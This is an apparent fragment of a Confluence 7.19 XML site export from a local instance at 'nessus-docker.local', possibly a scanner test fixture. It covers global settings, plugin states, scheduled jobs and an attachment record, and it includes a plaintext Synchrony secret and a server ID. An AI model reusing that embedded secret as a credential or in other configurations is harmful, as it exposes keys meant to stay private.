<emailAddressVisibility>email.address.public</emailAddressVisibility>
|
||||
<defaultEncoding>UTF-8</defaultEncoding>
|
||||
<maxThumbHeight>300</maxThumbHeight>
|
||||
<maxThumbWidth>300</maxThumbWidth>
|
||||
<backupAttachmentsDaily>true</backupAttachmentsDaily>
|
||||
<backupDaily>true</backupDaily>
|
||||
<backupPath>/var/atlassian/application-data/confluence/backups</backupPath>
|
||||
<nofollowExternalLinks>true</nofollowExternalLinks>
|
||||
<indexingLanguage>english</indexingLanguage>
|
||||
<globalDefaultLocale>en_GB</globalDefaultLocale>
|
||||
<dailyBackupFilePrefix>backup-</dailyBackupFilePrefix>
|
||||
<dailyBackupDateFormatPattern>yyyy_MM_dd</dailyBackupDateFormatPattern>
|
||||
<supportRequestEmail>confluence-autosupportrequests@atlassian.com</supportRequestEmail>
|
||||
<defaultSpaceHomepageTitle>Home</defaultSpaceHomepageTitle>
|
||||
<baseUrl>http://nessus-docker.local:8090</baseUrl>
|
||||
<attachmentDataStore>file.system.based.attachments.storage</attachmentDataStore>
|
||||
<displayLinkIcons>false</displayLinkIcons>
|
||||
<addWildcardsToUserAndGroupSearches>true</addWildcardsToUserAndGroupSearches>
|
||||
<xsrfAddComments>true</xsrfAddComments>
|
||||
<webSudoTimeout>10</webSudoTimeout>
|
||||
<webSudoEnabled>true</webSudoEnabled>
|
||||
<defaultUsersGroup>confluence-users</defaultUsersGroup>
|
||||
<attachmentSecurityLevel>smart</attachmentSecurityLevel>
|
||||
<enableJavascriptTop>true</enableJavascriptTop>
|
||||
<supportPeriodEndMessageOff>false</supportPeriodEndMessageOff>
|
||||
<enableWysiwyg>true</enableWysiwyg>
|
||||
<useWysiwygByDefault>true</useWysiwygByDefault>
|
||||
<numberOfBreadcrumbAncestors>1</numberOfBreadcrumbAncestors>
|
||||
<viewSpaceGoesToSpaceSummary>false</viewSpaceGoesToSpaceSummary>
|
||||
<enableLikes>false</enableLikes>
|
||||
<currentIndexVersion>0</currentIndexVersion>
|
||||
<maintenanceBannerMessageOn>false</maintenanceBannerMessageOn>
|
||||
<maxSimultaneousQuickNavRequests>40</maxSimultaneousQuickNavRequests>
|
||||
<maxRssItems>200</maxRssItems>
|
||||
<rssTimeout>60</rssTimeout>
|
||||
<pageTimeout>120</pageTimeout>
|
||||
</settings>]]></property>
|
||||
</object>
|
||||
<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
|
||||
<id name="id">32769</id>
|
||||
<property name="context"><![CDATA[_GLOBAL]]></property>
|
||||
<property name="key"><![CDATA[confluence.server.id]]></property>
|
||||
<property name="value"><![CDATA[<string>BNRR-EUMS-GPB5-FJVB</string>]]></property>
|
||||
</object>
|
||||
<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
|
||||
<id name="id">32786</id>
|
||||
<property name="context"><![CDATA[ds]]></property>
|
||||
<property name="key"><![CDATA[atlassian.confluence.space.settings]]></property>
|
||||
<property name="value"><![CDATA[<com.atlassian.confluence.setup.settings.SpaceSettings>
|
||||
<spaceKey>ds</spaceKey>
|
||||
<disableLogo>false</disableLogo>
|
||||
<colourSchemesSettings>
|
||||
<colourSchemeType>global</colourSchemeType>
|
||||
</colourSchemesSettings>
|
||||
<doNotSave>false</doNotSave>
|
||||
</com.atlassian.confluence.setup.settings.SpaceSettings>]]></property>
|
||||
</object>
|
||||
<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
|
||||
<id name="id">32787</id>
|
||||
<property name="context"><![CDATA[ds]]></property>
|
||||
<property name="key"><![CDATA[sidebar.nav-type]]></property>
|
||||
<property name="value"><![CDATA[<string>page-tree</string>]]></property>
|
||||
</object>
|
||||
<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
|
||||
<id name="id">32784</id>
|
||||
<property name="context"><![CDATA[ds]]></property>
|
||||
<property name="key"><![CDATA[atlassian.confluence.theme.settings]]></property>
|
||||
<property name="value"><![CDATA[<map>
|
||||
<entry>
|
||||
<string>theme.key</string>
|
||||
<string></string>
|
||||
</entry>
|
||||
</map>]]></property>
|
||||
</object>
|
||||
<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
|
||||
<id name="id">32785</id>
|
||||
<property name="context"><![CDATA[ds]]></property>
|
||||
<property name="key"><![CDATA[atlassian.confluence.css.resource.counter]]></property>
|
||||
<property name="value"><![CDATA[<int>4</int>]]></property>
|
||||
</object>
|
||||
<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
|
||||
<id name="id">32782</id>
|
||||
<property name="context"><![CDATA[_GLOBAL]]></property>
|
||||
<property name="key"><![CDATA[atlassian.confluence.plugin.resource.counter]]></property>
|
||||
<property name="value"><![CDATA[<int>2</int>]]></property>
|
||||
</object>
|
||||
<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
|
||||
<id name="id">32783</id>
|
||||
<property name="context"><![CDATA[ds]]></property>
|
||||
<property name="key"><![CDATA[copyspace.copier.spacekey]]></property>
|
||||
<property name="value"><![CDATA[<string>DEMO</string>]]></property>
|
||||
</object>
|
||||
<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
|
||||
<id name="id">32780</id>
|
||||
<property name="context"><![CDATA[_GLOBAL]]></property>
|
||||
<property name="key"><![CDATA[AO_950DC3_#]]></property>
|
||||
<property name="value"><![CDATA[<string>20</string>]]></property>
|
||||
</object>
|
||||
<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
|
||||
<id name="id">32781</id>
|
||||
<property name="context"><![CDATA[_GLOBAL]]></property>
|
||||
<property name="key"><![CDATA[plugin.manager.state.Map]]></property>
|
||||
<property name="value"><![CDATA[<map>
|
||||
<entry>
|
||||
<string>com.atlassian.confluence.plugins.confluence-content-notifications-plugin:blogpost-trashed-notification-template-body</string>
|
||||
<boolean>true</boolean>
|
||||
</entry>
|
||||
<entry>
|
||||
<string>com.atlassian.confluence.plugins.confluence-inline-tasks:task-email-notification-template-body</string>
|
||||
<boolean>true</boolean>
|
||||
</entry>
|
||||
<entry>
|
||||
<string>com.atlassian.confluence.plugins.confluence-content-notifications-plugin:comment-created-notification-template-body</string>
|
||||
<boolean>true</boolean>
|
||||
</entry>
|
||||
<entry>
|
||||
<string>com.atlassian.confluence.plugins.confluence-content-notifications-plugin:page-trashed-notification-template-body</string>
|
||||
<boolean>true</boolean>
|
||||
</entry>
|
||||
<entry>
|
||||
<string>com.atlassian.confluence.plugins.confluence-content-notifications-plugin:blogpost-edited-hipchat-notification-template-body</string>
|
||||
<boolean>true</boolean>
|
||||
</entry>
|
||||
<entry>
|
||||
<string>com.atlassian.confluence.plugins.confluence-content-notifications-plugin:page-edited-hipchat-notification-template-body</string>
|
||||
<boolean>true</boolean>
|
||||
</entry>
|
||||
<entry>
|
||||
<string>com.atlassian.confluence.plugins.share-page:share-page-hipchat-notification-template-body</string>
|
||||
<boolean>true</boolean>
|
||||
</entry>
|
||||
<entry>
|
||||
<string>com.atlassian.confluence.plugins.confluence-content-notifications-plugin:page-moved-notification-template-body</string>
|
||||
<boolean>true</boolean>
|
||||
</entry>
|
||||
<entry>
|
||||
<string>com.atlassian.confluence.plugins.confluence-like:like-created-notification-template-body</string>
|
||||
<boolean>true</boolean>
|
||||
</entry>
|
||||
<entry>
|
||||
<string>com.atlassian.confluence.plugins.synchrony-interop</string>
|
||||
<boolean>true</boolean>
|
||||
</entry>
|
||||
<entry>
|
||||
<string>com.atlassian.confluence.plugins.confluence-request-access-plugin:request-access-notification-email-template-body</string>
|
||||
<boolean>true</boolean>
|
||||
</entry>
|
||||
<entry>
|
||||
<string>com.atlassian.confluence.plugins.confluence-content-notifications-plugin:follower-added-notification-template-body</string>
|
||||
<boolean>true</boolean>
|
||||
</entry>
|
||||
<entry>
|
||||
<string>com.atlassian.confluence.plugins.confluence-hipchat-integration-plugin</string>
|
||||
<boolean>false</boolean>
|
||||
</entry>
|
||||
<entry>
|
||||
<string>com.atlassian.confluence.plugins.confluence-content-notifications-plugin:page-created-notification-template-body</string>
|
||||
<boolean>true</boolean>
|
||||
</entry>
|
||||
<entry>
|
||||
<string>com.atlassian.confluence.plugins.confluence-onboarding:notification-template-less-users-body</string>
|
||||
<boolean>true</boolean>
|
||||
</entry>
|
||||
<entry>
|
||||
<string>com.atlassian.plugins.base-hipchat-integration-plugin-api</string>
|
||||
<boolean>false</boolean>
|
||||
</entry>
|
||||
<entry>
|
||||
<string>com.atlassian.confluence.plugins.confluence-file-notifications:file-content-update-email-notification-template-body</string>
|
||||
<boolean>true</boolean>
|
||||
</entry>
|
||||
<entry>
|
||||
<string>com.atlassian.confluence.plugins.confluence-onboarding:notification-template-no-spaces-body</string>
|
||||
<boolean>true</boolean>
|
||||
</entry>
|
||||
<entry>
|
||||
<string>com.atlassian.confluence.plugins.confluence-collaborative-editor-plugin</string>
|
||||
<boolean>true</boolean>
|
||||
</entry>
|
||||
<entry>
|
||||
<string>com.atlassian.confluence.plugins.confluence-mentions-plugin:mention-hipchat-notification-template-body</string>
|
||||
<boolean>true</boolean>
|
||||
</entry>
|
||||
<entry>
|
||||
<string>com.atlassian.plugins.base-hipchat-integration-plugin</string>
|
||||
<boolean>false</boolean>
|
||||
</entry>
|
||||
<entry>
|
||||
<string>com.atlassian.confluence.plugins.confluence-content-notifications-plugin:comment-edited-notification-template-body</string>
|
||||
<boolean>true</boolean>
|
||||
</entry>
|
||||
<entry>
|
||||
<string>com.atlassian.confluence.plugins.confluence-inline-comments:notification-template-new-mail-body</string>
|
||||
<boolean>true</boolean>
|
||||
</entry>
|
||||
<entry>
|
||||
<string>com.atlassian.confluence.plugins.confluence-notifications-batch-plugin:batching-notification-template-body</string>
|
||||
<boolean>true</boolean>
|
||||
</entry>
|
||||
<entry>
|
||||
<string>com.atlassian.confluence.plugins.share-page:share-attachment-email-notification-template-body</string>
|
||||
<boolean>true</boolean>
|
||||
</entry>
|
||||
<entry>
|
||||
<string>com.atlassian.confluence.plugins.share-page:share-draft-email-notification-template-body</string>
|
||||
<boolean>true</boolean>
|
||||
</entry>
|
||||
<entry>
|
||||
<string>com.atlassian.confluence.plugins.confluence-content-notifications-plugin:blogpost-created-hipchat-notification-template-body</string>
|
||||
<boolean>true</boolean>
|
||||
</entry>
|
||||
<entry>
|
||||
<string>com.atlassian.confluence.plugins.confluence-content-notifications-plugin:page-edited-notification-template-body</string>
|
||||
<boolean>true</boolean>
|
||||
</entry>
|
||||
<entry>
|
||||
<string>com.atlassian.confluence.plugins.confluence-inline-comments:notification-template-resolve-body</string>
|
||||
<boolean>true</boolean>
|
||||
</entry>
|
||||
<entry>
|
||||
<string>com.atlassian.confluence.plugins.confluence-inline-comments:notification-template-reply-body</string>
|
||||
<boolean>true</boolean>
|
||||
</entry>
|
||||
<entry>
|
||||
<string>com.atlassian.confluence.plugins.confluence-inline-tasks:task-hipchat-notification-template-body</string>
|
||||
<boolean>true</boolean>
|
||||
</entry>
|
||||
<entry>
|
||||
<string>com.atlassian.confluence.plugins.confluence-hipchat-emoticons-plugin</string>
|
||||
<boolean>false</boolean>
|
||||
</entry>
|
||||
<entry>
|
||||
<string>com.atlassian.confluence.plugins.share-page:share-page-email-notification-template-body</string>
|
||||
<boolean>true</boolean>
|
||||
</entry>
|
||||
<entry>
|
||||
<string>com.atlassian.confluence.plugins.confluence-content-notifications-plugin:blogpost-created-notification-template-body</string>
|
||||
<boolean>true</boolean>
|
||||
</entry>
|
||||
<entry>
|
||||
<string>com.atlassian.confluence.plugins.confluence-content-notifications-plugin:comment-edited-hipchat-notification-template-body</string>
|
||||
<boolean>true</boolean>
|
||||
</entry>
|
||||
<entry>
|
||||
<string>com.atlassian.confluence.plugins.confluence-content-notifications-plugin:blogpost-edited-notification-template-body</string>
|
||||
<boolean>true</boolean>
|
||||
</entry>
|
||||
<entry>
|
||||
<string>com.atlassian.confluence.plugins.confluence-content-notifications-plugin:follower-added-hipchat-notification-template-body</string>
|
||||
<boolean>true</boolean>
|
||||
</entry>
|
||||
<entry>
|
||||
<string>com.atlassian.confluence.plugins.confluence-content-notifications-plugin:comment-created-hipchat-notification-template-body</string>
|
||||
<boolean>true</boolean>
|
||||
</entry>
|
||||
<entry>
|
||||
<string>com.atlassian.confluence.plugins.confluence-content-notifications-plugin:page-created-hipchat-notification-template-body</string>
|
||||
<boolean>true</boolean>
|
||||
</entry>
|
||||
<entry>
|
||||
<string>com.atlassian.confluence.plugins.confluence-content-notifications-plugin:forgot-password-notification-template-body</string>
|
||||
<boolean>true</boolean>
|
||||
</entry>
|
||||
<entry>
|
||||
<string>com.atlassian.confluence.plugins.confluence-mentions-plugin:mention-notification-template-body</string>
|
||||
<boolean>true</boolean>
|
||||
</entry>
|
||||
<entry>
|
||||
<string>com.atlassian.confluence.plugins.confluence-file-notifications:file-content-remove-email-notification-template-body</string>
|
||||
<boolean>true</boolean>
|
||||
</entry>
|
||||
<entry>
|
||||
<string>com.atlassian.confluence.plugins.confluence-request-access-plugin:grant-access-notification-email-template-body</string>
|
||||
<boolean>true</boolean>
|
||||
</entry>
|
||||
<entry>
|
||||
<string>com.atlassian.confluence.plugins.confluence-like:like-created-notification-template-hipchat-body</string>
|
||||
<boolean>true</boolean>
|
||||
</entry>
|
||||
<entry>
|
||||
<string>com.atlassian.labs.hipchat.confluence-hipchat</string>
|
||||
<boolean>false</boolean>
|
||||
</entry>
|
||||
</map>]]></property>
|
||||
</object>
|
||||
<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
|
||||
<id name="id">32778</id>
|
||||
<property name="context"><![CDATA[_GLOBAL]]></property>
|
||||
<property name="key"><![CDATA[AO_9412A1_#]]></property>
|
||||
<property name="value"><![CDATA[<string>8</string>]]></property>
|
||||
</object>
|
||||
<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
|
||||
<id name="id">32779</id>
|
||||
<property name="context"><![CDATA[_GLOBAL]]></property>
|
||||
<property name="key"><![CDATA[AO_7B47A5_#]]></property>
|
||||
<property name="value"><![CDATA[<string>4</string>]]></property>
|
||||
</object>
|
||||
<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
|
||||
<id name="id">32776</id>
|
||||
<property name="context"><![CDATA[_GLOBAL]]></property>
|
||||
<property name="key"><![CDATA[AO_187CCC_#]]></property>
|
||||
<property name="value"><![CDATA[<string>1</string>]]></property>
|
||||
</object>
|
||||
<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
|
||||
<id name="id">32777</id>
|
||||
<property name="context"><![CDATA[com.atlassian.confluence.plugins.pulp]]></property>
|
||||
<property name="key"><![CDATA[version.history]]></property>
|
||||
<property name="value"><![CDATA[<map>
|
||||
<entry>
|
||||
<string>7.19.12</string>
|
||||
<string>2023-11-09T06:02:36.753Z</string>
|
||||
</entry>
|
||||
</map>]]></property>
|
||||
</object>
|
||||
<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
|
||||
<id name="id">32774</id>
|
||||
<property name="context"><![CDATA[_GLOBAL]]></property>
|
||||
<property name="key"><![CDATA[AO_21D670_#]]></property>
|
||||
<property name="value"><![CDATA[<string>1</string>]]></property>
|
||||
</object>
|
||||
<object class="Secrets" package="com.atlassian.synchrony">
|
||||
<id name="key"><![CDATA[Synchrony-0fccd6a4-3e18-398a-8fe4-ff41cdd6c7ad]]></id>
|
||||
<property name="value"><![CDATA[ZmUL2wyLlx8ROyTY/satsTeR2J61ADRUqTnTe8Ai1og=]]></property>
|
||||
</object>
|
||||
<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
|
||||
<id name="id">32775</id>
|
||||
<property name="context"><![CDATA[_GLOBAL]]></property>
|
||||
<property name="key"><![CDATA[AO_A0B856_#]]></property>
|
||||
<property name="value"><![CDATA[<string>1</string>]]></property>
|
||||
</object>
|
||||
<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
|
||||
<id name="id">32772</id>
|
||||
<property name="context"><![CDATA[_GLOBAL]]></property>
|
||||
<property name="key"><![CDATA[synchrony_collaborative_editor_UUID]]></property>
|
||||
<property name="value"><![CDATA[<string>d32aafab-7f6d-4630-a017-f69b71948e20</string>]]></property>
|
||||
</object>
|
||||
<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
|
||||
<id name="id">32773</id>
|
||||
<property name="context"><![CDATA[com.atlassian.confluence.efi.store.GlobalStorageServiceImpl]]></property>
|
||||
<property name="key"><![CDATA[efi.store.onboarding.plugin-installed-date-in-millis]]></property>
|
||||
<property name="value"><![CDATA[<string>1699509752102</string>]]></property>
|
||||
</object>
|
||||
<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
|
||||
<id name="id">32866</id>
|
||||
<property name="context"><![CDATA[com.atlassian.confluence.schedule.ScheduledJobConfiguration]]></property>
|
||||
<property name="key"><![CDATA[DEFAULT#DailyReportJob]]></property>
|
||||
<property name="value"><![CDATA[<com.atlassian.confluence.schedule.ScheduledJobConfiguration>
|
||||
<enabled>true</enabled>
|
||||
<cronSchedule/>
|
||||
<repeatInterval/>
|
||||
</com.atlassian.confluence.schedule.ScheduledJobConfiguration>]]></property>
|
||||
</object>
|
||||
<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
|
||||
<id name="id">32867</id>
|
||||
<property name="context"><![CDATA[com.atlassian.confluence.schedule.ScheduledJobConfiguration]]></property>
|
||||
<property name="key"><![CDATA[DEFAULT#cacheStatsJob]]></property>
|
||||
<property name="value"><![CDATA[<com.atlassian.confluence.schedule.ScheduledJobConfiguration>
|
||||
<enabled>true</enabled>
|
||||
<cronSchedule/>
|
||||
<repeatInterval/>
|
||||
</com.atlassian.confluence.schedule.ScheduledJobConfiguration>]]></property>
|
||||
</object>
|
||||
<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
|
||||
<id name="id">32864</id>
|
||||
<property name="context"><![CDATA[com.atlassian.confluence.schedule.ScheduledJobConfiguration]]></property>
|
||||
<property name="key"><![CDATA[DEFAULT#BackupJob]]></property>
|
||||
<property name="value"><![CDATA[<com.atlassian.confluence.schedule.ScheduledJobConfiguration>
|
||||
<enabled>true</enabled>
|
||||
<cronSchedule/>
|
||||
<repeatInterval/>
|
||||
</com.atlassian.confluence.schedule.ScheduledJobConfiguration>]]></property>
|
||||
</object>
|
||||
<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
|
||||
<id name="id">32865</id>
|
||||
<property name="context"><![CDATA[com.atlassian.confluence.schedule.ScheduledJobConfiguration]]></property>
|
||||
<property name="key"><![CDATA[DEFAULT#SynchronyEventsSoftRemovalScheduledJob]]></property>
|
||||
<property name="value"><![CDATA[<com.atlassian.confluence.schedule.ScheduledJobConfiguration>
|
||||
<enabled>true</enabled>
|
||||
<cronSchedule/>
|
||||
<repeatInterval/>
|
||||
</com.atlassian.confluence.schedule.ScheduledJobConfiguration>]]></property>
|
||||
</object>
|
||||
<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
|
||||
<id name="id">32862</id>
|
||||
<property name="context"><![CDATA[com.atlassian.confluence.schedule.ScheduledJobConfiguration]]></property>
|
||||
<property name="key"><![CDATA[DEFAULT#MailQueueFlushJob]]></property>
|
||||
<property name="value"><![CDATA[<com.atlassian.confluence.schedule.ScheduledJobConfiguration>
|
||||
<enabled>true</enabled>
|
||||
<cronSchedule/>
|
||||
<repeatInterval/>
|
||||
</com.atlassian.confluence.schedule.ScheduledJobConfiguration>]]></property>
|
||||
</object>
|
||||
<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
|
||||
<id name="id">32863</id>
|
||||
<property name="context"><![CDATA[com.atlassian.confluence.schedule.ScheduledJobConfiguration]]></property>
|
||||
<property name="key"><![CDATA[DEFAULT#SchedulerRunDetailsPurgeJob]]></property>
|
||||
<property name="value"><![CDATA[<com.atlassian.confluence.schedule.ScheduledJobConfiguration>
|
||||
<enabled>true</enabled>
|
||||
<cronSchedule/>
|
||||
<repeatInterval/>
|
||||
</com.atlassian.confluence.schedule.ScheduledJobConfiguration>]]></property>
|
||||
</object>
|
||||
<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
|
||||
<id name="id">32860</id>
|
||||
<property name="context"><![CDATA[com.atlassian.confluence.schedule.ScheduledJobConfiguration]]></property>
|
||||
<property name="key"><![CDATA[DEFAULT#ClearExpiredRememberMeTokensJob]]></property>
|
||||
<property name="value"><![CDATA[<com.atlassian.confluence.schedule.ScheduledJobConfiguration>
|
||||
<enabled>true</enabled>
|
||||
<cronSchedule/>
|
||||
<repeatInterval/>
|
||||
</com.atlassian.confluence.schedule.ScheduledJobConfiguration>]]></property>
|
||||
</object>
|
||||
<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
|
||||
<id name="id">32861</id>
|
||||
<property name="context"><![CDATA[com.atlassian.confluence.schedule.ScheduledJobConfiguration]]></property>
|
||||
<property name="key"><![CDATA[DEFAULT#SynchronyEventsHardRemovalScheduledJob]]></property>
|
||||
<property name="value"><![CDATA[<com.atlassian.confluence.schedule.ScheduledJobConfiguration>
|
||||
<enabled>false</enabled>
|
||||
<cronSchedule/>
|
||||
<repeatInterval/>
|
||||
</com.atlassian.confluence.schedule.ScheduledJobConfiguration>]]></property>
|
||||
</object>
|
||||
<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
|
||||
<id name="id">32858</id>
|
||||
<property name="context"><![CDATA[com.atlassian.confluence.schedule.ScheduledJobConfiguration]]></property>
|
||||
<property name="key"><![CDATA[DEFAULT#SystemMaintenanceTaskQueueFlusherScheduledJob]]></property>
|
||||
<property name="value"><![CDATA[<com.atlassian.confluence.schedule.ScheduledJobConfiguration>
|
||||
<enabled>true</enabled>
|
||||
<cronSchedule/>
|
||||
<repeatInterval/>
|
||||
</com.atlassian.confluence.schedule.ScheduledJobConfiguration>]]></property>
|
||||
</object>
|
||||
<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
|
||||
<id name="id">32859</id>
|
||||
<property name="context"><![CDATA[com.atlassian.confluence.schedule.ScheduledJobConfiguration]]></property>
|
||||
<property name="key"><![CDATA[DEFAULT#ClusterSafetyJob]]></property>
|
||||
<property name="value"><![CDATA[<com.atlassian.confluence.schedule.ScheduledJobConfiguration>
|
||||
<enabled>true</enabled>
|
||||
<cronSchedule/>
|
||||
<repeatInterval/>
|
||||
</com.atlassian.confluence.schedule.ScheduledJobConfiguration>]]></property>
|
||||
</object>
|
||||
<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
|
||||
<id name="id">32856</id>
|
||||
<property name="context"><![CDATA[com.atlassian.confluence.schedule.ScheduledJobConfiguration]]></property>
|
||||
<property name="key"><![CDATA[DEFAULT#IndexSnapshotCleaner]]></property>
|
||||
<property name="value"><![CDATA[<com.atlassian.confluence.schedule.ScheduledJobConfiguration>
|
||||
<enabled>true</enabled>
|
||||
<cronSchedule/>
|
||||
<repeatInterval/>
|
||||
</com.atlassian.confluence.schedule.ScheduledJobConfiguration>]]></property>
|
||||
</object>
|
||||
<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
|
||||
<id name="id">32857</id>
|
||||
<property name="context"><![CDATA[com.atlassian.confluence.schedule.ScheduledJobConfiguration]]></property>
|
||||
<property name="key"><![CDATA[DEFAULT#JmxAppLoggingJob]]></property>
|
||||
<property name="value"><![CDATA[<com.atlassian.confluence.schedule.ScheduledJobConfiguration>
|
||||
<enabled>true</enabled>
|
||||
<cronSchedule/>
|
||||
<repeatInterval/>
|
||||
</com.atlassian.confluence.schedule.ScheduledJobConfiguration>]]></property>
|
||||
</object>
|
||||
<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
|
||||
<id name="id">32854</id>
|
||||
<property name="context"><![CDATA[com.atlassian.confluence.schedule.ScheduledJobConfiguration]]></property>
|
||||
<property name="key"><![CDATA[DEFAULT#EhCacheCompactionJob]]></property>
|
||||
<property name="value"><![CDATA[<com.atlassian.confluence.schedule.ScheduledJobConfiguration>
|
||||
<enabled>true</enabled>
|
||||
<cronSchedule/>
|
||||
<repeatInterval/>
|
||||
</com.atlassian.confluence.schedule.ScheduledJobConfiguration>]]></property>
|
||||
</object>
|
||||
<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
|
||||
<id name="id">32855</id>
|
||||
<property name="context"><![CDATA[com.atlassian.confluence.schedule.ScheduledJobConfiguration]]></property>
|
||||
<property name="key"><![CDATA[DEFAULT#ReIndexHouseKeepingScheduledJob]]></property>
|
||||
<property name="value"><![CDATA[<com.atlassian.confluence.schedule.ScheduledJobConfiguration>
|
||||
<enabled>true</enabled>
|
||||
<cronSchedule/>
|
||||
<repeatInterval/>
|
||||
</com.atlassian.confluence.schedule.ScheduledJobConfiguration>]]></property>
|
||||
</object>
|
||||
<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
|
||||
<id name="id">32852</id>
|
||||
<property name="context"><![CDATA[com.atlassian.confluence.schedule.ScheduledJobConfiguration]]></property>
|
||||
<property name="key"><![CDATA[DEFAULT#LocalTaskQueueFlushJob]]></property>
|
||||
<property name="value"><![CDATA[<com.atlassian.confluence.schedule.ScheduledJobConfiguration>
|
||||
<enabled>true</enabled>
|
||||
<cronSchedule/>
|
||||
<repeatInterval/>
|
||||
</com.atlassian.confluence.schedule.ScheduledJobConfiguration>]]></property>
|
||||
</object>
|
||||
<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
|
||||
<id name="id">32853</id>
|
||||
<property name="context"><![CDATA[com.atlassian.confluence.schedule.ScheduledJobConfiguration]]></property>
|
||||
<property name="key"><![CDATA[DEFAULT#TrashHardRemovalScheduledJob]]></property>
|
||||
<property name="value"><![CDATA[<com.atlassian.confluence.schedule.ScheduledJobConfiguration>
|
||||
<enabled>false</enabled>
|
||||
<cronSchedule/>
|
||||
<repeatInterval/>
|
||||
</com.atlassian.confluence.schedule.ScheduledJobConfiguration>]]></property>
|
||||
</object>
|
||||
<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
|
||||
<id name="id">32882</id>
|
||||
<property name="context"><![CDATA[com.atlassian.confluence.schedule.ScheduledJobConfiguration]]></property>
|
||||
<property name="key"><![CDATA[DEFAULT#reminderJob]]></property>
|
||||
<property name="value"><![CDATA[<com.atlassian.confluence.schedule.ScheduledJobConfiguration>
|
||||
<enabled>true</enabled>
|
||||
<cronSchedule/>
|
||||
<repeatInterval/>
|
||||
</com.atlassian.confluence.schedule.ScheduledJobConfiguration>]]></property>
|
||||
</object>
|
||||
<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
|
||||
<id name="id">32883</id>
|
||||
<property name="context"><![CDATA[com.atlassian.confluence.schedule.ScheduledJobConfiguration]]></property>
|
||||
<property name="key"><![CDATA[DEFAULT#confluenceDailyStatisticsPublisherJob]]></property>
|
||||
<property name="value"><![CDATA[<com.atlassian.confluence.schedule.ScheduledJobConfiguration>
|
||||
<enabled>true</enabled>
|
||||
<cronSchedule/>
|
||||
<repeatInterval/>
|
||||
</com.atlassian.confluence.schedule.ScheduledJobConfiguration>]]></property>
|
||||
</object>
|
||||
<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
|
||||
<id name="id">32880</id>
|
||||
<property name="context"><![CDATA[com.atlassian.confluence.schedule.ScheduledJobConfiguration]]></property>
|
||||
<property name="key"><![CDATA[DEFAULT#onboardingNumberOfUsersCheckJob]]></property>
|
||||
<property name="value"><![CDATA[<com.atlassian.confluence.schedule.ScheduledJobConfiguration>
|
||||
<enabled>true</enabled>
|
||||
<cronSchedule/>
|
||||
<repeatInterval/>
|
||||
</com.atlassian.confluence.schedule.ScheduledJobConfiguration>]]></property>
|
||||
</object>
|
||||
<object class="Attachment" package="com.atlassian.confluence.pages">
|
||||
<id name="id">98355</id>
|
||||
<property name="hibernateVersion">3</property>
|
||||
<property name="title"><![CDATA[step-2-image-1.png]]></property>
|
||||
<property name="lowerTitle"><![CDATA[step-2-image-1.png]]></property>
|
||||
<collection name="contentProperties" class="java.util.Collection"><element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262201</id>
|
||||
</element>
|
||||
<element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262203</id>
|
||||
</element>
|
||||
<element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262205</id>
|
||||
</element>
|
||||
<element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262207</id>
|
||||
</element>
|
||||
</collection>
|
||||
<property name="version">1</property>
|
||||
<property name="creator" class="ConfluenceUserImpl" package="com.atlassian.confluence.user"><id name="key"><![CDATA[2c9280828bb2ac81018bb2ae01d80000]]></id>
|
||||
</property>
|
||||
<property name="creationDate">2020-10-26 15:44:29.341</property>
|
||||
<property name="lastModifier" class="ConfluenceUserImpl" package="com.atlassian.confluence.user"><id name="key"><![CDATA[2c9280828bb2ac81018bb2ae01d80000]]></id>
|
||||
</property>
|
||||
<property name="lastModificationDate">2023-11-09 06:03:45.265</property>
|
||||
<property name="versionComment"><![CDATA[]]></property>
|
||||
<property name="contentStatus"><![CDATA[current]]></property>
|
||||
<property name="containerContent" class="Page" package="com.atlassian.confluence.pages"><id name="id">98322</id>
|
||||
</property>
|
||||
<property name="space" class="Space" package="com.atlassian.confluence.spaces"><id name="id">131073</id>
|
||||
</property>
|
||||
</object>
|
||||
